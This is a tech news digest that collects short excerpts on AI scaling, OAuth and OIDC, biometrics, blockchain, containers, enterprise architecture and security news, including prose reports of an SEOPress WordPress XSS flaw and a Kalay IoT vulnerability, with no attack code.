In most instances, AI pilot programs show promising results but then fail to scale. Accenture surveys point to 84 percent of C-suite executives acknowledging that scaling AI is important for future growth, but a whopping 76 percent also admit that they are struggling to do so. The only way to realize the full potential of AI is by scaling it across the enterprise. Unfortunately, some AI teams think only in terms of executing a workable prototype to establish proof-of-concept, or at best transform a department or function. Teams that think enterprise-scale at the design stage can go successfully from pilot to enterprise-scale production. They often build and work on ML-Ops platforms to standardize the ML lifecycle and build a factory line for data preparation, cataloguing, model management, AI assurance, and more. AI technologies demand huge compute and storage capacities, which often only large, sophisticated organizations can afford. Because resources are limited, AI access is privileged in most companies. This compromises performance because fewer minds mean fewer ideas, fewer identified problems, and fewer innovations.


Software Testing in the World of Next-Gen Technologies

If there is a technology that has gained momentum during the past decade, it is nothing other than artificial intelligence. AI offers the potential to mimic human tasks and improvise the operations through its own intellect, the logic it brings to business shows scope for productive inferences. However, the benefit of AI can only be achieved by feeding computers with data sets, and this needs the right QA and testing practices. As long as automation testing implementation needs to be done for deriving results, performance could only be achieved by using the right input data leading to effective processing. Moreover, the improvement of AI solutions is beneficial not only for other industries, but QA itself, since many of the testing and quality assurance processes depend on automation technology powered by artificial intelligence. The introduction of artificial intelligence into the testing process has the potential to enable smarter testing. So, the testing of AI solutions could enable software technologies to work on better reasoning and problem-solving capabilities.


What Makes Agile Transformations Successful? Results From A Scientific Study

The ultimate test of any model is to test it with every Scrum team and every organization. Since this is not practically feasible, scientists use advanced statistical techniques to draw conclusions about the population from a smaller sample of data from that population. Two things are important here. The first is that the sample must be big enough to reliably distinguish effects from the noise that always exists in data. The second is that the sample must be representative enough of the larger population in order to generalize findings to it. It is easy to understand why. Suppose that you’re tasked with testing the purity of the water in a lake. You can’t feasibly check every drop of water for contaminants. But you can sample some of the water and test it. This sample has to be big enough to detect contaminants and small enough to remain feasible. It's also possible that contaminants are not equally distributed across the lake. So it's a good idea to sample and test a bucket of water at various spots from the lake. This is effectively what happens here.


OAuth 2.0 and OIDC Fundamentals for Authentication and Authorization

The main goal of OAuth 2.0 is delegated authorization. In other words, as we saw earlier, the primary purpose of OAuth 2.0 is to grant an app access to data owned by another app. OAuth 2.0 does not focus on authentication, and as such, any authentication implementation using OAuth 2.0 is non-standard. That’s where OpenID Connect (OIDC) comes in. OIDC adds a standards-based authentication layer on top of OAuth 2.0. The Authorization Server in the OAuth 2.0 flows now assumes the role of Identity Server (or OIDC Provider). The underlying protocol is almost identical to OAuth 2.0 except that the Identity Server delivers an Identity Token (ID Token) to the requesting app. The Identity Token is a standard way of encoding the claims about the authentication of the user. We will talk more about identity tokens later. ... For both these flows, the app/client must be registered with the Authorization Server. The registration process results in the generation of a client_idand a client_secret which must then be configured on the app/client requesting authentication.


How Biometric Solutions Are Shaping Workplace Security

Today, the corporate world and biometric technology go hand in hand. Companies cannot operate seamlessly without biometrics. Regular security checks just don’t cut it in companies anymore. Since biometric technologies are designed specifically to offer the highest level of security, there is limited to no room when it comes to defrauding these systems. Thus, technologies like ID Document Capture, Selfie Capture, 3D Face Map Creation, etc., are becoming the best way to secure the workplace. Biometric technology allows for specific data collection. It doesn’t just reduce the risk of a data breach but also protects important data in offices. Whether it’s cards, passwords, documents, etc., biometric technology eliminates the need for such hackable security implementations at the workplace. All biometric data like fingerprints, facial mapping, and so on are extremely difficult to replicate. Certain biological characteristics don’t change with time, and that prevents authentication errors. Hence, there’s limited scope for identity replication or mimicry. Customized personal identity access control has become an employee’s right of sorts. 


How to avoid being left behind in today’s fast-paced marketplace

The ability to speed up processes and respond more quickly to a highly dynamic market is the key to survival in today’s competitive business environment. For many large businesses, the ERP system forms a crucial part of the digital core, which is supplemented by best-of-breed applications in areas such as customer experience, supply chain, and asset management. When it comes to digitalisation, organisations will often focus on these applications and the connections between them. However, we often see businesses forget to automate processes in the digital core itself — an oversight that can negatively impact other digitalisation efforts. For example, the ability to analyse demand trends on social media in the customer-focused application can offer valuable insights, but if it takes months for the product data needed to launch a new product variant to be accessed, customer trends are likely to have already moved on. If we look more closely at the process of launching a new product to market, this is a prime example of where digital transformation can be applied to help manufacturers remain agile and respond to market trends more quickly. 


FireEye, CISA Warn of Critical IoT Device Vulnerability

Kalay is a network protocol that helps devices easily connect to a software application. In most cases, the protocol is implemented in IoT devices through a software development kit that's typically installed by original equipment manufacturers. That makes tracking devices that use the protocol difficult, the FireEye researchers note. The Kalay protocol is used in a variety of enterprise IoT and connected devices, including security cameras, but also dozens of consumer devices, such as "smart" baby monitors and DVRs, the FireEye report states. "Because the Kalay platform is intended to be used transparently and is bundled as part of the OEM manufacturing process, [FireEye] Mandiant was not able to create a complete list of affected devices and geographic regions," says Dillon Franke, one of the three FireEye researcher who conducted the research on the vulnerability. FireEye's Mandiant Red Team first uncovered the vulnerability in 2020. If exploited, the flaw can allow an attacker to remotely control a vulnerable device, "resulting in the ability to listen to live audio, watch real-time video data and compromise device credentials for further attacks based on exposed device functionality," the security firm reports.


An Introduction to Blockchain

The distributed ledger created using blockchain technology is unlike a traditional network, because it does not have a central authority common in a traditional network structure. Decision-making power usually resides with a central authority, who decides in all aspects of the environment. Access to the network and data is subject to the individual responsible for the environment. The traditional database structure therefore is controlled by power. This is not to say that a traditional network structure is not effective. Certain business functions may best be managed by a central authority. However, such a network structure is not without its challenges. Transactions take time to process and cost money; they are not validated by all parties due to limited network participation, and they are prone to error and vulnerable to hacking. To process transactions in a traditional network structure also requires technical skills. In contrast, the distributed ledger is control by rules, not a central authority. The database is accessible to all the members of the network and installed on all the computers that use the database. Consensus between members is required to add transactions to the database.



Quote for the day:

"Nothing is less productive than to make more efficient what should not be done at all." -- Peter Drucker

Daily Tech Digest - August 19, 2021

XSS Bug in SEOPress WordPress Plugin Allows Site Takeover

“The permissions_callback for the endpoint only verified if the user had a valid REST-API nonce in the request,” according to the posting. “A valid REST-API nonce can be generated by any authenticated user using the rest-nonce WordPress core AJAX action.” Depending on what an attacker updates the title and description to, it would allow a number of malicious actions, up to and including full site takeover, researchers said. “The payload could include malicious web scripts, like JavaScript, due to a lack of sanitization or escaping on the stored parameters,” they wrote. “These web scripts would then execute any time a user accessed the ‘All Posts’ page. As always, cross-site scripting vulnerabilities such as this one can lead to a variety of malicious actions like new administrative account creation, webshell injection, arbitrary redirects and more. This vulnerability could easily be used by an attacker to take over a WordPress site.” To protect their websites, users should upgrade to version 5.0.4 of SEOPress. Vulnerabilities in WordPress plugins remain fairly common. 


How building a world class SOC can alleviate security team burnout

In the short term, this alert overload means an increased potential for high-risk threats being missed as analysts attempt to slog through as many alerts as possible alongside their other duties. Aside from the immediate security issues, this kind of environment poses some serious long-term problems. The frustrations of burnt-out teams can build to the point where analysts will decide to quit their job in search of less stressful positions. We have found that around half of security personnel are considering changing roles at any given time. Not only will they be taking their experience and skills with them, but the ongoing cyber shortage means finding a replacement may be a long and costly process. A team that spends most of its time trudging through alerts and running to put out security fires will also have very little time left for any higher-level strategic activity. This might include undertaking in-depth risk analysis and establishing improved security strategies and processes. Without this activity, the organization will struggle to keep up with evolving cyber threats.


Security through obscurity no longer works

You might expect that companies would be better off keeping their cards close to their chest. The less hackers know about how a company guards its data, the safer the data becomes, according to this line of thinking. In fact, the opposite is true. Secrecy in cyber security puts everyone at risk: the company, its customers, and its suppliers. Electric vehicles serve as a good example of the value of openness in cyber security. Many models require extremely sophisticated software that has to be updated frequently. For example, Tesla distributes updates to owners at least once per month. To deliver updates, an electric car maker requires worldwide access privileges to the on-board computers on its cars. Naturally, car owners want certainty that this does not expose them to hacking, remote carjackings and shut downs, or being spied on as they drive. For this reason, makers of electric vehicles need to be extremely open about their cyber security so that owners, or trusted experts, can assess if the company’s systems offer effective protection. Although they do not themselves manage data, telecom equipment makers take their responsibility in supplying network operators just as seriously as makers of electric cars.


Container Best Practices: What They Are and Why You Should Care

One of the common pitfalls organizations make is to succumb in practice to the misperception that minification of containers IS container best practices. Without a doubt, an outsized amount of time and energy is spent thinking about reducing the size of a container image (minification), and with good reason. Smaller images are safer; faster to push, pull, and scan; and just generally less cumbersome in the development lifecycle. That’s why “shrinking a container” has become a common subject for blog posts, video tutorials and Twitter posts. It’s also why the DockerSlim open source project, created and maintained by Kyle Quest, is so popular. It is best known for its ability to automatically create a functionally equivalent but smaller container. Another common tactic for container minification could be described as “The Tale of Two Containers.” In this approach, developers first create a “dev container” comprising all the tools they love to use for development. Then, once development is complete, developers convert their “dev containers” to “prod containers,” typically by replacing the “heavy” underlying base image with something lighter and more secure.


What is Today´s Relevance of an Enterprise Architecture Practice?

It seems that, especially in modern tech companies, the importance of the Enterprise Architecture (EA) practice is decreasing. Some organizations might even consider it an irrelevant practice. In the following, we analyze where such opinions emerge from. In the later parts of this series, we will provide arguments against that reasoning and provide an analysis, which underpins that this is not the end of Enterprise Architecture as a practice. However, Enterprise Architecture will go through a transformation towards an adapted set of activities, new priorities, and new required skills. ... Apart from the arguments above, there is an additional observation, which is common across many different organizations: The more old-world / legacy IT an organization has, the more important the Enterprise Architects in the organization are. Similarly, in organizations with old and new world IT, Enterprise Architects are responsible for managing the architecture of the old world. However, they have only little influence on the development of the new world IT; the digital area. 


How computer vision works — and why it’s plagued by bias

Like machine learning overall, computer vision dates back to the 1950s. Without our current computing power and data access, the technique was originally very manual and prone to error. But it did still resemble computer vision as we know it today; the effectiveness of first processing according to basic properties like lines or edges, for example, was discovered in 1959. That same year also saw the invention of a technology that made it possible to transform images into grids of numbers , which incorporated the binary language machines could understand into images. Throughout the next few decades, more technical breakthroughs helped pave the way for computer vision. First, there was the development of computer scanning technology, which for the first time enabled computers to digitize images. Then came the ability to turn two-dimensional images into three-dimensional forms. Object recognition technology that could recognize text arrived in 1974, and by 1982, computer vision really started to take shape. In that same year, one researcher further developed the processing hierarchy, just as another developed an early neural network.


John Oliver on ransomware attacks: ‘It’s in everyone’s interest to get this under control’

Most ominously, ransomware attacks now threaten numerous internet-connected, “smart” in-home devices, such as thermostats, TVs, ovens or even internet-enabled sex toys, such as a butt plug. Which prompted Oliver to remind his audience “arseholes are like opinions – letting the internet be in charge of yours is a really bad idea”. Oliver was legally obligated to say that the butt plug comes with a physical key for emergencies, “which I’m not sure is completely reassuring – keys do get lost, don’t they? Just picture the last time you searched for keys around your house and now raise the stakes significantly.” The point, he continued, was that the costs of ransomware keep raising, as the barrier to entry keeps lowering. The explosion in attacks derives from three main factors. First, ransomware as a service, as in hacking programs sold a la carte, precluding technical know-how. “Ideally, no one would launch ransomware attacks,” said Oliver, “but my next preference would be that launching one should require significantly more work than simply clicking ‘add ransomware to cart.’”


IoT could drive adoption of near-premises computing

Strategically, it's not a major leap to consider near-premises data centers that are hybrid, on premises or cloud-based. However, there are always issues such as figuring out how to redeploy when you have budget constraints and also existing resources that must stay working, CIOs and infrastructure architects must also find time to reconstruct IT infrastructure for near-premises computing. Crawford said that enterprises adopting near-premises computing can reduce their compute and storage infrastructure TCO by 30% to 50% and eliminate most or all of the capital costs they would typically need to spend on the data center itself; and that these gains can be further compounded by turning capital expenses into operating expenses through new scalable service models. If CIOs can demonstrate these gains in the cost models that they prepare for IT budgets, near-premises computing may indeed become a new implementation strategy at the edge. Don't overlook the resilience that near-premises computing brings. "The performance of near-premises computing rivals that of on-premises computing but also has the capability to add significantly more resilience," Crawford said.


Enterprise Architecture for Digital Business: Integrated Transformation Strategies

In order to move forward with the DT journeys in this new horizon of post-pandemic era, practitioners must consider a broader perspective of EA. They must review the impacts as well as synergies of innovation, disruption, and collaboration with their transformation initiatives. An innovation is not just a new way of developing and deploying business solutions – it is also to deliver tangible business outcomes to customers proactively and consistently. Disruption often leverages innovation to accentuate the changes in a business using emerging technology trends. Collaboration harnesses the power of innovation and disruption to enable practitioners work together and achieve quantifiable business results. It is evident that in this near-post-pandemic era, a new horizon of the business world is evolving. The practitioners must endure rapid changes through the use of digital transformation while leveraging a nimble, flexible, and agile enterprise architecture framework that embraces the essence of innovation, disruption, and collaboration efficiently.


What it means to be a Human leader

Listening should be an everyday task. Leaders discover what is on their staff’s mind only by listening, whether that is a set-piece exercise or on an ongoing basis. Charlie Jacobs, the senior partner at London-based law firm Linklaters since 2016, tries to do this by putting himself in places where he can have informal conversations. Back when business travel was commonplace, whenever he arrived in one of Linklaters’ 30 offices around the world, he headed to the gym, not the boardroom, to find out what was going on. Jacobs was no fan of after-hours drinks and preferred a pre-work spinning class that allowed him to mingle with colleagues from all levels while working up a sweat. “I get a different cross-section of people coming, we get a shake or a fruit juice afterwards, and they can see a more down-to-earth side to the senior partner,” he told me. ... Human leaders are focused on making the best use of their time and keeping organizations focused on their mission. They act as executive sponsors to pluck ideas from within their organization and ensure that promising projects make headway.



Quote for the day:

"Inspired leaders move a business beyond problems into opportunities." -- Dr. Abraham Zaleznik